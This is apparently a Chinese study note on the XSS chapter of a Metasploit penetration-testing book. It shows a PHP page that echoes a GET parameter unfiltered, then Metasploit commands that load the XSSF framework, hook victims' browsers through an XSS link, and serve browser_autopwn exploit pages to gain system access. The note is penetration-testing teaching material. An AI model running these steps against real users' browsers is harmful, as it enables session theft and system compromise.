《Metasploit渗透测试魔鬼训练营》 之 XSS

跨站脚本攻击(XSS)就是WEB应用对用户输入没有做限制，导致攻击者向WEB应用程序输入数据中包含javascript等脚本代码，WEB程序在其他用户访问该页面时，将攻击者输入的脚本代码返回给用户，导致该脚本代码在浏览器中执行，导致Cookie窃取等问题。

一、XSS漏洞展现

WEB服务器文件xss.php:

echo $_GET[‘as’];  

?>

构造url: http://ip/xss.php?as=

这样用户在访问url时，服务器将返回给用户，javascript代码用户浏览器执行。

二、XSSF框架使用

跨站脚本漏洞攻击框架（XSSF），该框架可以辅助XSS漏洞利用。

1、安装

将XSSF解压后放入/opt/framework/msf3下

2、攻击用户

load xssf: 加载框架

xssf_urls：查看框架访问url

将http://ip:8888/loop通过XSS漏洞让用户点击

（用户点击之后和受害者IE进程网络连接保持，可以向受害者IE发送数据，已经在受害者机器上有一定权限）

xssf_victims: 查看受害者信息

xssf_information victimID: 查看受害者详细信息

3、生成各种浏览器漏洞页面

启动browser_autopwn模块：生成各种exploit页面

use auxiliary/server/browser_autopwn

set LHOST localhostip

set SRVHOST localhostip

set SRVPORT 8080

exploit

jobs : 显示exploit id

4、向浏览器发送漏洞页面，获取系统权限

Xssf_exploit victimID exploit_id：向受害者IE发送exploit页面

 

拜了个拜！